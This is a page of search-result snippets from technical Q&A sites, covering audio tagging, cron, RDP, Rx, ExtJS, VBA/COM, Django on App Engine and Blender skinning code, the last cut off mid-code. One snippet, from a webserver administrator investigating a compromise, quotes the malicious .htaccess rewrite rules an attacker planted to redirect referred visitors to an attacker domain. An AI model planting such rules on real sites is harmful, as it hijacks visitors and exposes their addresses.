Search Results

Search found 558 results on 23 pages for 'varying'.

Page 16/23 | < Previous Page | 12 13 14 15 16 17 18 19 20 21 22 23  | Next Page >

  • Preserve embedded album art when converting from .flac to .ogg

    - by Profpatsch
    I want to convert my archived .flac library to .ogg for daily use. Using find ./ -iname '*.flac' -print0 | xargs -0 -n1 oggenc -q6 on the root music folder and then deleting every .flac (having copies of them in archive) seems straight forward, after trying it with one file it worked and all of the tags were transfered, too, except for one: Embedded album art! I always prefer emedded covers over folder images, since I have some albums with varying covers. One possible solution is discussed here, but the script only works if the image is already extracted: Embed album art in OGG through command line in linux One possible solution I thought about was extracting album art from every song (not every song has one, though, and some even 2 or 3!), temporarily saving it and then using the script to include it into the finished .ogg. But then I want to increase the number of processes xargs runs simultaniously to save time, so the temp images need to have a distinct name. Is there a (linux) program that knows how to handle this? Or is there a finished script floating around somewhere? It would be nice if oggenc supported adding embedded coverart and it really is a shame, since these two formats should (in theory) share the same tag format. Edit: 15 days and noone even tries to answer. It’s funny, most of my questions don’t get answered. Too hard? Wrong SE site?

    Read the article

  • Would an array of SSD drives be able to succesfully substitute the system memory?

    - by Florin Mircea
    I watched a few videos trying to answer this. This video (youtube.com/watch?v=eULFf6F5Ri8) shows a bunch of guys stacking 24 SSD's reaching a peak of around 2GBps r/w. That's under the limit of the worst DDR3 in this list (memorybenchmark.net/write_ddr3_amd.html) - that shows DDR3 memory performance varying from 2.78 to 6.55 Gb per second, but that video is over 3 years old. This video (youtube.com/watch?v=27GmBzQWwP0) shows a more optimistic situation, but for PCI-E SSD drives: 5 drives peaking at around 4Gb. And this other video shows that stacking up more than 3 SSD's doesn't realistically offer a substantial added performance. This and the fact that in all benchmarks the drives act quite poorly when dealing with small files (5k file read/write averaging from 10MB to around 30-40MBps) as opposed to how native memory handles such files, seems to indicate a definite NO to this question. Also, the write life cycle is indeed limited and the drives might wear out quickly, as kindly pointed out by paddy. However, I wanted to get more opinions on this. Would it be possible to at least obtain current memory performance with SSD's in RAID 0? And if so, in what circumstances? I am assuming using this configuration with a Windows OS that has a memory pagefile resident to that stack of SSD's, thus making it very fast to work with.

    Read the article

  • Why is my cron daemon is being killed every few minutes?

    - by user113215
    As of about a week ago, my cron daemon refuses to stay running. I'm using Debian 6 x64 on an OpenVZ virtual machine. Running something like pgrep cron shows that the daemon isn't running. I start the service with service cron start or /etc/init.d/cron start and it launches, but it disappears from the running process list after a few minutes (varying anywhere between 1 - 30 minutes before the process is killed again). Using strace -f service cron start, I can see that the process is being killed for some reason: nanosleep({60, 0}, <unfinished ...> +++ killed by SIGKILL +++ There's nothing relevant in /var/log/syslog, /var/log/messages, /var/log/auth.log, or /var/log/kern.log to explain why the the process is dying. The system has at least 800 MB of free memory, and cat /proc/loadavg returns 0.22 0.13 0.04 so resources shouldn't be the issue. With cron running, free -m reports: total used free shared buffers cached Mem: 1024 211 812 0 0 0 -/+ buffers/cache: 211 812 Swap: 0 0 0 I also tried removing and reinstalling the cron package using apt-get. Update: I initially thought the problem was a resource issues. I erased my entire VPS and started from a fresh Debian image. There is now nothing else running on the system, but even from a clean install my cron daemon is still being killed at random. What else should I check? How do I find out what's killing my crond?

    Read the article

  • CPU operating temperature ranges

    - by osij2is
    I have an AMD Phenom II 960T with 2 cores unlocked for a total of 6 cores. I don't overclock at all. I have a Arctic Cooling ACALP64 Heatsink/Fan installed. I'm currently running ESXi 5.0 so I have to go into the BIOS to read the CPU temperatures, which at idle seem to be in the 71-74C range. To me, this is pretty high, but I cannot find any official temperature ranges that AMD says the CPU can work well within. There seems to be a lot of questions on superuser and numerous forums around CPU temperatures but no one seems to have a clear consensus as to what the manufacturer temperature ranges are for specific CPUs. I've tried searching through AMDs site to no avail. At this point, I'd be willing to shut off the 2 extra cores if it keeps the heat down but until I get some sort of tolerance or range for temperature, I have no idea if the CPU is being damaged or not. Can anyone point to a direct source, article, FAQ from AMD that specifically states their CPUs temperature range? Or are CPU temperature ranges so varying that there's no possible baseline? Am I being too paranoid about this? To me, anything over 65C is a bit much and if I'm in the low-mid 70s range with NO VMs running, what can I expect if I have several VMs running?

    Read the article

  • rdp allow client reconnect without password prompt after several hours

    - by Tom
    Let me describe the setup first: client PC with several rdp sessions to local servers, all opened from saved rdp sessions with stored passwords, using the standard windows rdp client. several windows servers on the LAN, with varying server OS: windows server 2003, 2008, and even 2012 now. When I log onto my PC I open up rdp sessions to all those servers, and keep them open all the time for various reasons. Overnight the client PC is put into sleep or hibernate mode, thereby braking the rdp connections. On the next day when I wake the client PC and login again, the rdp sessions automatically try to reconnect to the servers, and this leads to the question: starting with server 2008 something apparently changed in the rdp server config, as all servers with 2008, 2008r2 and 2012 will prompt for the password in the rdp session, whereas the 2003 server rdp connections will re-establish without the password prompt. Apparently there is a timeout setting on 2008+ that, when exceeded, requires a reauthentication. Is there any way to setup the 2008+ servers to behave like 2003 did? I'd like the rdp sessions to reconnect without a password prompt even after a several hour disconnect.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • My laptop screen keeps dimming

    - by Rowland
    I have a Cryo laptop with Windows 7 installed, bought in December 2011. Sometimes the screen seems to persistently dim and/or brighten up, even as I am doing things. In fact the brightness is varying even as I type this. The battery is always fully charged and connected to the mains. I have checked many times the battery/power-saving settings always leaving the settings the same way; full brightness and never dimming when on the mains. Yet when the screen starts playing up I can end up with the screen dimming and brightening almost continuously. I once went to the "adjust screen brightness" window when the screen had dimmed. I found the brightness slider on 100% (as I expected) but, as I dragged it to the left, to dim the screen, it first brightened and then started dimming, i.e. the screen setting said 100% brightness but it was only at, maybe 80%. I have checked with Cryo and they just say check the power settings. I know what these are and how to work them and always set them to never dim/full brightness, yet still my laptop starts this dimming every so often.

    Read the article

  • Is it possible to use ffmpeg to trim off X seconds from the beginning of a video with an unspecified length?

    - by marcelebrate
    I need to trim the just the first 1 or 2 seconds off of a series of FLV recordings of varying, unspecified lengths. I've found plenty of resources for extracting a specified duration from a video (e.g. 30 second clips), but none for continuing to the end of a video. Both of these attempts just yield a copied version of the video, sans desired trimming: ffmpeg -ss 2 -vcodec copy -acodec copy -i input.flv output.flv ffmpeg -ss 2 -t 120 -vcodec copy -acodec copy -i input.flv output.flv The thought on the second one was: perhaps if I specified a length beyond what was possible, it'd just go to the end. No dice. I know it's not an issue with codecs or using seconds instead of timecode since the following worked a charm: ffmpeg -ss 2 -t 5 -vcodec copy -acodec copy -i input.flv output.flv Any other ideas? I'm open to using other (Windows-based) command line tools, however am strongly favoring ffmpeg since I'm already using it for thumbnail creation and am familiar with it. If it helps, my videos will all be under 2 minutes.

    Read the article

  • Methods and practices for managing a network that has no internet connection

    - by FaultyJuggler
    Originally asked in Super User but realized this belongs here. Long story short, I am setting up a network with 32 servers of varying specs that will be used for testing and development. We will be using RedHat Linux, we also do not have a router as of yet and were looking into making one of the servers act as our router/DHCP etc. The small cluster will be on an isolated network with no internet. I can use external harddrives and discs to transfer anything from external sources into machines on the network, so this isn't a locked down secure network, it just won't have a direct connection to the outside world. I've worked on such setups before, but always long after they were setup. So I'm reaching out to see what everyone knows as far as how groups have handled initial setup and maintenance of such a situation. What is the best way to get them all configured and up to date? What are the best ways to automate updates, network wide installs, etc. With the only given that I have large multi-terabyte external hard drives that would be used to drop whatever files are needed onto a central server, how do i then distribute those files and install their contents? I've done perl scripting, some teammates have played with puppet, so we aren't completely in the dark, I just wanted to avoid reinventing the wheel since this is a common challenge.

    Read the article

  • Reactive Extensions vs FileSystemWatcher

    - by Joel Mueller
    One of the things that has long bugged me about the FileSystemWatcher is the way it fires multiple events for a single logical change to a file. I know why it happens, but I don't want to have to care - I just want to reparse the file once, not 4-6 times in a row. Ideally, there would be an event that only fires when a given file is done changing, rather than every step along the way. Over the years I've come up with various solutions to this problem, of varying degrees of ugliness. I thought Reactive Extensions would be the ultimate solution, but there's something I'm not doing right, and I'm hoping someone can point out my mistake. I have an extension method: public static IObservable<IEvent<FileSystemEventArgs>> GetChanged(this FileSystemWatcher that) { return Observable.FromEvent<FileSystemEventArgs>(that, "Changed"); } Ultimately, I would like to get one event per filename, within a given time period - so that four events in a row with a single filename are reduced to one event, but I don't lose anything if multiple files are modified at the same time. BufferWithTime sounds like the ideal solution. var bufferedChange = watcher.GetChanged() .Select(e => e.EventArgs.FullPath) .BufferWithTime(TimeSpan.FromSeconds(1)) .Where(e => e.Count > 0) .Select(e => e.Distinct()); When I subscribe to this observable, a single change to a monitored file triggers my subscription method four times in a row, which rather defeats the purpose. If I remove the Distinct() call, I see that each of the four calls contains two identical events - so there is some buffering going on. Increasing the TimeSpan passed to BufferWithTime seems to have no effect - I went as high as 20 seconds without any change in behavior. This is my first foray into Rx, so I'm probably missing something obvious. Am I doing it wrong? Is there a better approach? Thanks for any suggestions...

    Read the article

  • Ext.data.Store, Javascript Arrays and Ext.grid.ColumnModel

    - by Michael Wales
    I am using Ext.data.Store to call a PHP script which returns a JSON response with some metadata about fields that will be used in a query (unique name, table, field, and user-friendly title). I then loop through each of the Ext.data.Record objects, placing the data I need into an array (this_column), push that array onto the end of another array (columns), and eventually pass this to an Ext.grid.ColumnModel object. The problem I am having is - no matter which query I am testing against (I have a number of them, varying in size and complexity), the columns array always works as expected up to columns[15]. At columns[16], all indexes from that point and previous are filled with the value of columns[15]. This behavior continues until the loop reaches the end of the Ext.data.Store object, when the entire arrays consists of the same value. Here's some code: columns = []; this_column = []; var MetaData = Ext.data.Record.create([ {name: 'id'}, {name: 'table'}, {name: 'field'}, {name: 'title'} ]); // Query the server for metadata for the query we're about to run metaDataStore = new Ext.data.Store({ autoLoad: true, reader: new Ext.data.JsonReader({ totalProperty: 'results', root: 'fields', id: 'id' }, MetaData), proxy: new Ext.data.HttpProxy({ url: 'index.php/' + type + '/' + slug }), listeners: { 'load': function () { metaDataStore.each(function(r) { this_column['id'] = r.data['id']; this_column['header'] = r.data['title']; this_column['sortable'] = true; this_column['dataIndex'] = r.data['table'] + '.' + r.data['field']; // This display valid information, through the entire process console.info(this_column['id'] + ' : ' + this_column['header'] + ' : ' + this_column['sortable'] + ' : ' + this_column['dataIndex']); columns.push(this_column); }); // This goes nuts at columns[15] console.info(columns); gridColModel = new Ext.grid.ColumnModel({ columns: columns });

    Read the article

  • Changing size of content in HorizontalScrollView when phone is rotated by overriding onConfiguration

    - by Emil Arfvidsson
    Hello I have a problem with resizing content in a HorizontalScrollView when the phone is rotated. I'm overriding onConfigurationChanged in my activity containing the HorizontalScrollView, since I want to handle the resizing myself. However, I'm having great problem finding where i should put the resizing of the content. The HorizontalScrollView it self has FILL_PARENT as width and a fixed height. The idea is that it should always fill the screen width-wise, while having several cells of content, each as wide as the HorizontalScrollView itself. The content in my HorizontalScrollView consists of one LinearLayout (let's call it wrapperLayout) with several LinearLayouts inside it. When the phone rotates I simply want to change the width of all the LinearLayouts inside the wrapperLayout. This is easy to do and works great when I test the resizing code by putting it in onInterceptTouchEvent(MotionEvent ev), that is the views are resized just as they are supposed to when I touch the HorizontalScrollView. The difficulty appears when I try to find a good spot to execute resizing code, so that the resizing happens automatically when the phone is rotated. I have tried all possible combinations of requestLayout, onSizeChanged, onLayout, onConfigurationChanged and a few others and varying their calls to super (if any) before and after the resizing code. I can not make this work (the views are not resized even though the resize code is executed) and it is really frustrating. I've done a lot of logging to make sure the HorizonalScrollView really has changed width before calling my resize code but to no avail. Does anyone have any clue as to what is going on? What methods are called and in what order when I handle the onConfigurationChanged by myself like this? Thanks in advance

    Read the article

  • serializing type definitions?

    - by Dave
    I'm not positive I'm going about this the right way. I've got a suite of applications that have varying types of output (custom defined types). For example, I might have a type called Widget: Class Widget Public name as String End Class Throughout the course of operation, when a user experiences a certain condition, the application will take that output instance of widget that user received, serialize it, and log it to the database noting the name of the type. Now, I have other applications that do something similar, but instead of dealing with Widget, it could be some totally random other type with different attributes, but again I serialize the instance, log it to the db, and note the name of the type. I have maybe a half dozen different types and don't anticipate too many additional ones in the future. After all this is said and done, I have an admin interface that looks through these logs, and has the ability for the user to view the contents of this data thats been logged. The Admin app has a reference to all the types involved, and with some basic switch case logic hinged upon the name of the type, will cast it into their original types, and pass it on to some handlers that have basic display logic to spit the data back out in a readable format (one display handler for each type) NOW... all this is well and good... Until one day, my model changed. The Widget class now has deprecated the name attribute and added on a bunch of other attributes. I will of course get type mismatches in the admin side when I try to reconstitute this data. I was wondering if there was some way, at runtime, i could perhaps reflect through my code and get a snapshot of the type definition at that precise moment, serialize it, and store it along with the data so that I could somehow use this to reconstitute it in the future?

    Read the article

  • Nesting gridview/formview in webuser control inside a parent gridview

    - by Stuart
    Hi, I'm developing an ASP.net 2 website for our HR department, where the front page has a matrix of all our departments against pay grades, with links in each cell to all the jobs for that department for that grade. These links take you a page with a gridview populated dynamically, as each department has a different number of teams, e.g. Finance has one team, IT has four. Each cell has a webuser control inserted into it. The user control has a sql datasource, pulling out all the job titles and the primary key, popuating a formview, with a linkbutton whose text value is bound to the job title. (I'm using a usercontrol as this page will also be used to show the results of a search of all roles in a range of grades for a department, and will have a varying number of rows). I've got everything to display nicely, but when I click on the linkbutton, instead of running the code I've put in the Click event, the page posts back without firing any events. Having looked around, it looks like I have to put an addhandler line in somewhere, but I'm not sure where, could anyone give me some pointers please? (fairly numpty please, I'm not too experience in ASP yet and am winging it. I'm also using VB but C# isn't a problem) This is how I'm inserting the controls into the parent grid, have I missed anything obvious? For row As Int16 = 0 To dgvRoleGrid.Rows.Count - 1 tempwuc = New UserControl tempwuc = LoadControl("wucRoleList.ascx") tempwuc.ID = "wucRoleList" & col.ToString tempwuc.EnableViewState = True dgvRoleGrid.Rows(row).Cells(col).Controls.Add(tempwuc) CType(dgvRoleGrid.Rows(row).FindControl(tempwuc.ID), wucRoleList).specialtyid = specid CType(dgvRoleGrid.Rows(row).FindControl(tempwuc.ID), wucRoleList).bandid = dgvRoleGrid.DataKeys(row)(0) CType(dgvRoleGrid.Rows(row).FindControl(tempwuc.ID), wucRoleList).familyid = Session("familyid") Next

    Read the article

  • How to display two series via Google Chart API?

    - by Chris
    I can't get the two series of numbers to scale together. Here is sample code that you can paste into... http://code.google.com/intl/en/apis/chart/docs/chart_playground.html cht=lxy chs=400x300 chd=t:20,30,40|1,4,2|24,34,44|3,7,1 chds=20,40,1,4,24,44,1,7 chxr=0,20,54,2|1,0,7,1 chxt=x,y chxs=0,ff0000,12,0,lt 1,0000ff,10,1,lt chco=FF0000,00FF00 chdl=Apples Oranges chtt=Some+Values chts=0000ff,24 Translated: chd=t:s,e,r,i,e,s,1|s,e,r,i,e,s,2|...ors:series1,series2,...ore:series1,series2,... chds=<series_1_min>,<series_1_max>,... chxr=<axis_index>,<start_val>,<end_val>,<step>|... The three varying parameters in question are: chd=t:20,30,40|1,4,2|24,34,44|3,7,1 chds=20,40,1,4,24,44,1,7 chxr=0,20,54,2|1,0,7,1 Can anyone get this simple example working? The chart supports multiple series but for some reason I can't scale it so that the values are displayed within scale. Any help appreciated, Chris

    Read the article

  • Mocking WebResponse's from a WebRequest

    - by Rob Cooper
    I have finally started messing around with creating some apps that work with RESTful web interfaces, however, I am concerned that I am hammering their servers every time I hit F5 to run a series of tests.. Basically, I need to get a series of web responses so I can test I am parsing the varying responses correctly, rather than hit their servers every time, I thought I could do this once, save the XML and then work locally. However, I don't see how I can "mock" a WebResponse, since (AFAIK) they can only be instantiated by WebRequest.GetResponse How do you guys go about mocking this sort of thing? Do you? I just really don't like the fact I am hammering their servers :S I dont want to change the code too much, but I expect there is a elegant way of doing this.. Update Following Accept Will's answer was the slap in the face I needed, I knew I was missing a fundamental point! Create an Interface that will return a proxy object which represents the XML. Implement the interface twice, on that uses WebRequest, the other that returns static "responses". The interface implmentation then either instantiates the return type based on the response, or the static XML. You can then pass the required class when testing or at production to the service layer. Once I have the code knocked up, I'll paste some samples. Thanks Will :)

    Read the article

  • How do I use a .NET class in VBA? Syntax help!

    - by Jordan S
    ok I have couple of .NET classes that I want to use in VBA. So I must register them through COM and all that. I think I have the COM registration figured out (finally) but now I need help with the syntax of how to create the objects. Here is some pseudo code showing what I am trying to do. EDIT: Changed Attached Objects to return an ArrayList instead of a List The .NET classes look like this... public class ResourceManagment { public ResourceManagment() { // Default Constructor } public static List<RandomObject> AttachedObjects() { ArrayList list = new ArrayList(); return list; } } public class RandomObject { // public RandomObject(int someParam) { } } OK, so this is what I would like to do in VBA (demonstrated in C#) but I don't know how... public class VBAClass { public void main() { ArrayList myList = ResourceManagment.AttachedObjects(); foreach(RandomObject x in myList) { // Do something with RandomObject x like list them in a Combobox } } } One thing to note is that RandomObject does not have a public default constructor. So I can not create an instance of it like Dim x As New RandomObject. MSDN says that you can not instantiate an object that doesn't have a default constructor through COM but you can still use the object type if it is returned by another method... Types must have a public default constructor to be instantiated through COM. Managed, public types are visible to COM. However, without a public default constructor (a constructor without arguments), COM clients cannot create an instance of the type. COM clients can still use the type if the type is instantiated in another way and the instance is returned to the COM client. You may include overloaded constructors that accept varying arguments for these types. However, constructors that accept arguments may only be called from managed (.NET) code. Added: Here is my attempt in VB: Dim count As Integer count = 0 Dim myObj As New ResourceManagment For Each RandomObject In myObj.AttachedObjects count = count + 1 Next RandomObject

    Read the article

  • File Uploading In Google Application Engine Using Django

    - by Ayush
    I am using gae with django. I have an project named MusicSite with following url mapping- urls.py from django.conf.urls.defaults import * from MusicSite.views import MainHandler from MusicSite.views import UploadHandler from MusicSite.views import ServeHandler urlpatterns = patterns('',(r'^start/', MainHandler), (r'^upload/', UploadHandler), (r'^/serve/([^/]+)?', ServeHandler), ) There is an application MusicSite inside MusicFun with the following codes- views.py import os import urllib from google.appengine.ext import blobstore from google.appengine.ext import webapp from google.appengine.ext.webapp import blobstore_handlers from google.appengine.ext.webapp import template from google.appengine.ext.webapp.util import run_wsgi_app def MainHandler(request): response=HttpResponse() upload_url = blobstore.create_upload_url('http://localhost: 8000/upload/') response.write('') response.write('' % upload_url) response.write("""Upload File: """) return HttpResponse(response) def UploadHandler(request): upload_files=request.FILES['file'] blob_info = upload_files[0] response.redirect('http://localhost:8000/serve/%s' % blob_info.key()) class ServeHandler(blobstore_handlers.BlobstoreDownloadHandler): def get(self, resource): resource = str(urllib.unquote(resource)) blob_info = blobstore.BlobInfo.get(resource) self.send_blob(blob_info) now whenever a upload a file using /start and click Submit i am taken to a blank page with the following url- localhost:8000/_ah/upload/ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yGwsSFV9fQmxvYlVwbG9hZFNlc3Npb25fXxgHDA These random alphabets keep varying but the result is same. A blank page after every upload. Somebody please help. The server responses are as below- INFO:root:"GET /start/ HTTP/1.1" 200 - INFO:root:"GET /favicon.ico HTTP/1.1" 404 - INFO:root:Internal redirection to http://localhost:8000/upload/ INFO:root:Upload handler returned 500 ERROR:root:Invalid upload handler response. Only 301, 302 and 303 statuses are permitted and it may not have a content body. INFO:root:"POST /_ah/upload/ ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yGwsSFV9fQmxvYlVwbG9hZFNlc3Npb25fXxgCDA HTTP/1.1" 500 - INFO:root:"GET /favicon.ico HTTP/1.1" 404 -

    Read the article

  • sIFR3: controlling a and a:hover styles inside replaced through CSS rather than JS

    - by sneeuwitje
    For graceful degrading and minimal coding for the sIFR feature on my websites I would want to define styles in CSS as much as possible. Here's what I do: Define a H3 tag to be replaced by sIFR3. H3 comes in varying colors by CSS depending on it's container, say body.blue-txt h3{ color: #009CDA; } body.white-txt h3{ color: #FFFFFF; } body.etc... H3 might contain an anchor (I'm aware of semantical issues, but that's just how it is ... sorry) With setting sIFR.useStyleCheck = true; sIFR3 will show replaced normal H3 text with correct color, but when it contains a link, it shows the Flash default #0000FF .... All fine; I can tweak e.g. blue text in sifr-config.js by using the css-parameter for sIFR.replace(): sIFR.replace(futura, { selector: 'body.blue-txt h3', css: 'a {color: #009CDA; }, a:hover { color: #009CDA; text-decoration: underline; }' }); But that would have to be coded for every single text-color in my sIFR replacements in both JS and CSS. So I would want to make the sIFR.useStyleCheck setting just respect the CSS in sifr-config.css like: body.blue-txt h3{ color: #009CDA; } body.blue-txt h3 a{ color: #009CDA; } body.blue-txt h3 a:hover{ color: #009CDA; text-decoration: underline; } Only this doesn't seem to work ... the link text keeps popping up as #0000FF and the hover is not underlined. Is this just Not A Feature (Yet), or am doing something wrong?

    Read the article

  • how to export bind and keyframe bone poses from blender to use in OpenGL

    - by SaldaVonSchwartz
    EDIT: I decided to reformulate the question in much simpler terms to see if someone can give me a hand with this. Basically, I'm exporting meshes, skeletons and actions from blender into an engine of sorts that I'm working on. But I'm getting the animations wrong. I can tell the basic motion paths are being followed but there's always an axis of translation or rotation which is wrong. I think the problem is most likely not in my engine code (OpenGL-based) but rather in either my misunderstanding of some part of the theory behind skeletal animation / skinning or the way I am exporting the appropriate joint matrices from blender in my exporter script. I'll explain the theory, the engine animation system and my blender export script, hoping someone might catch the error in either or all of these. The theory: (I'm using column-major ordering since that's what I use in the engine cause it's OpenGL-based) Assume I have a mesh made up of a single vertex v, along with a transformation matrix M which takes the vertex v from the mesh's local space to world space. That is, if I was to render the mesh without a skeleton, the final position would be gl_Position = ProjectionMatrix * M * v. Now assume I have a skeleton with a single joint j in bind / rest pose. j is actually another matrix. A transform from j's local space to its parent space which I'll denote Bj. if j was part of a joint hierarchy in the skeleton, Bj would take from j space to j-1 space (that is to its parent space). However, in this example j is the only joint, so Bj takes from j space to world space, like M does for v. Now further assume I have a a set of frames, each with a second transform Cj, which works the same as Bj only that for a different, arbitrary spatial configuration of join j. Cj still takes vertices from j space to world space but j is rotated and/or translated and/or scaled. Given the above, in order to skin vertex v at keyframe n. I need to: take v from world space to joint j space modify j (while v stays fixed in j space and is thus taken along in the transformation) take v back from the modified j space to world space So the mathematical implementation of the above would be: v' = Cj * Bj^-1 * v. Actually, I have one doubt here.. I said the mesh to which v belongs has a transform M which takes from model space to world space. And I've also read in a couple textbooks that it needs to be transformed from model space to joint space. But I also said in 1 that v needs to be transformed from world to joint space. So basically I'm not sure if I need to do v' = Cj * Bj^-1 * v or v' = Cj * Bj^-1 * M * v. Right now my implementation multiples v' by M and not v. But I've tried changing this and it just screws things up in a different way cause there's something else wrong. Finally, If we wanted to skin a vertex to a joint j1 which in turn is a child of a joint j0, Bj1 would be Bj0 * Bj1 and Cj1 would be Cj0 * Cj1. But Since skinning is defined as v' = Cj * Bj^-1 * v , Bj1^-1 would be the reverse concatenation of the inverses making up the original product. That is, v' = Cj0 * Cj1 * Bj1^-1 * Bj0^-1 * v Now on to the implementation (Blender side): Assume the following mesh made up of 1 cube, whose vertices are bound to a single joint in a single-joint skeleton: Assume also there's a 60-frame, 3-keyframe animation at 60 fps. The animation essentially is: keyframe 0: the joint is in bind / rest pose (the way you see it in the image). keyframe 30: the joint translates up (+z in blender) some amount and at the same time rotates pi/4 rad clockwise. keyframe 59: the joint goes back to the same configuration it was in keyframe 0. My first source of confusion on the blender side is its coordinate system (as opposed to OpenGL's default) and the different matrices accessible through the python api. Right now, this is what my export script does about translating blender's coordinate system to OpenGL's standard system: # World transform: Blender -> OpenGL worldTransform = Matrix().Identity(4) worldTransform *= Matrix.Scale(-1, 4, (0,0,1)) worldTransform *= Matrix.Rotation(radians(90), 4, "X") # Mesh (local) transform matrix file.write('Mesh Transform:\n') localTransform = mesh.matrix_local.copy() localTransform = worldTransform * localTransform for col in localTransform.col: file.write('{:9f} {:9f} {:9f} {:9f}\n'.format(col[0], col[1], col[2], col[3])) file.write('\n') So if you will, my "world" matrix is basically the act of changing blenders coordinate system to the default GL one with +y up, +x right and -z into the viewing volume. Then I also premultiply (in the sense that it's done by the time we reach the engine, not in the sense of post or pre in terms of matrix multiplication order) the mesh matrix M so that I don't need to multiply it again once per draw call in the engine. About the possible matrices to extract from Blender joints (bones in Blender parlance), I'm doing the following: For joint bind poses: def DFSJointTraversal(file, skeleton, jointList): for joint in jointList: bindPoseJoint = skeleton.data.bones[joint.name] bindPoseTransform = bindPoseJoint.matrix_local.inverted() file.write('Joint ' + joint.name + ' Transform {\n') translationV = bindPoseTransform.to_translation() rotationQ = bindPoseTransform.to_3x3().to_quaternion() scaleV = bindPoseTransform.to_scale() file.write('T {:9f} {:9f} {:9f}\n'.format(translationV[0], translationV[1], translationV[2])) file.write('Q {:9f} {:9f} {:9f} {:9f}\n'.format(rotationQ[1], rotationQ[2], rotationQ[3], rotationQ[0])) file.write('S {:9f} {:9f} {:9f}\n'.format(scaleV[0], scaleV[1], scaleV[2])) DFSJointTraversal(file, skeleton, joint.children) file.write('}\n') Note that I'm actually grabbing the inverse of what I think is the bind pose transform Bj. This is so I don't need to invert it in the engine. Also note I went for matrix_local, assuming this is Bj. The other option is plain "matrix", which as far as I can tell is the same only that not homogeneous. For joint current / keyframe poses: for kfIndex in keyframes: bpy.context.scene.frame_set(kfIndex) file.write('keyframe: {:d}\n'.format(int(kfIndex))) for i in range(0, len(skeleton.data.bones)): file.write('joint: {:d}\n'.format(i)) currentPoseJoint = skeleton.pose.bones[i] currentPoseTransform = currentPoseJoint.matrix translationV = currentPoseTransform.to_translation() rotationQ = currentPoseTransform.to_3x3().to_quaternion() scaleV = currentPoseTransform.to_scale() file.write('T {:9f} {:9f} {:9f}\n'.format(translationV[0], translationV[1], translationV[2])) file.write('Q {:9f} {:9f} {:9f} {:9f}\n'.format(rotationQ[1], rotationQ[2], rotationQ[3], rotationQ[0])) file.write('S {:9f} {:9f} {:9f}\n'.format(scaleV[0], scaleV[1], scaleV[2])) file.write('\n') Note that here I go for skeleton.pose.bones instead of data.bones and that I have a choice of 3 matrices: matrix, matrix_basis and matrix_channel. From the descriptions in the python API docs I'm not super clear which one I should choose, though I think it's the plain matrix. Also note I do not invert the matrix in this case. The implementation (Engine / OpenGL side): My animation subsystem does the following on each update (I'm omitting parts of the update loop where it's figured out which objects need update and time is hardcoded here for simplicity): static double time = 0; time = fmod((time + elapsedTime),1.); uint16_t LERPKeyframeNumber = 60 * time; uint16_t lkeyframeNumber = 0; uint16_t lkeyframeIndex = 0; uint16_t rkeyframeNumber = 0; uint16_t rkeyframeIndex = 0; for (int i = 0; i < aClip.keyframesCount; i++) { uint16_t keyframeNumber = aClip.keyframes[i].number; if (keyframeNumber <= LERPKeyframeNumber) { lkeyframeIndex = i; lkeyframeNumber = keyframeNumber; } else { rkeyframeIndex = i; rkeyframeNumber = keyframeNumber; break; } } double lTime = lkeyframeNumber / 60.; double rTime = rkeyframeNumber / 60.; double blendFactor = (time - lTime) / (rTime - lTime); GLKMatrix4 bindPosePalette[aSkeleton.jointsCount]; GLKMatrix4 currentPosePalette[aSkeleton.jointsCount]; for (int i = 0; i < aSkeleton.jointsCount; i++) { F3DETQSType& lPose = aClip.keyframes[lkeyframeIndex].skeletonPose.joints[i]; F3DETQSType& rPose = aClip.keyframes[rkeyframeIndex].skeletonPose.joints[i]; GLKVector3 LERPTranslation = GLKVector3Lerp(lPose.t, rPose.t, blendFactor); GLKQuaternion SLERPRotation = GLKQuaternionSlerp(lPose.q, rPose.q, blendFactor); GLKVector3 LERPScaling = GLKVector3Lerp(lPose.s, rPose.s, blendFactor); GLKMatrix4 currentTransform = GLKMatrix4MakeWithQuaternion(SLERPRotation); currentTransform = GLKMatrix4TranslateWithVector3(currentTransform, LERPTranslation); currentTransform = GLKMatrix4ScaleWithVector3(currentTransform, LERPScaling); GLKMatrix4 inverseBindTransform = GLKMatrix4MakeWithQuaternion(aSkeleton.joints[i].inverseBindTransform.q); inverseBindTransform = GLKMatrix4TranslateWithVector3(inverseBindTransform, aSkeleton.joints[i].inverseBindTransform.t); inverseBindTransform = GLKMatrix4ScaleWithVector3(inverseBindTransform, aSkeleton.joints[i].inverseBindTransform.s); if (aSkeleton.joints[i].parentIndex == -1) { bindPosePalette[i] = inverseBindTransform; currentPosePalette[i] = currentTransform; } else { bindPosePalette[i] = GLKMatrix4Multiply(inverseBindTransform, bindPosePalette[aSkeleton.joints[i].parentIndex]); currentPosePalette[i] = GLKMatrix4Multiply(currentPosePalette[aSkeleton.joints[i].parentIndex], currentTransform); } aSkeleton.skinningPalette[i] = GLKMatrix4Multiply(currentPosePalette[i], bindPosePalette[i]); } Finally, this is my vertex shader: #version 100 uniform mat4 modelMatrix; uniform mat3 normalMatrix; uniform mat4 projectionMatrix; uniform mat4 skinningPalette[6]; uniform lowp float skinningEnabled; attribute vec4 position; attribute vec3 normal; attribute vec2 tCoordinates; attribute vec4 jointsWeights; attribute vec4 jointsIndices; varying highp vec2 tCoordinatesVarying; varying highp float lIntensity; void main() { tCoordinatesVarying = tCoordinates; vec4 skinnedVertexPosition = vec4(0.); for (int i = 0; i < 4; i++) { skinnedVertexPosition += jointsWeights[i] * skinningPalette[int(jointsIndices[i])] * position; } vec4 skinnedNormal = vec4(0.); for (int i = 0; i < 4; 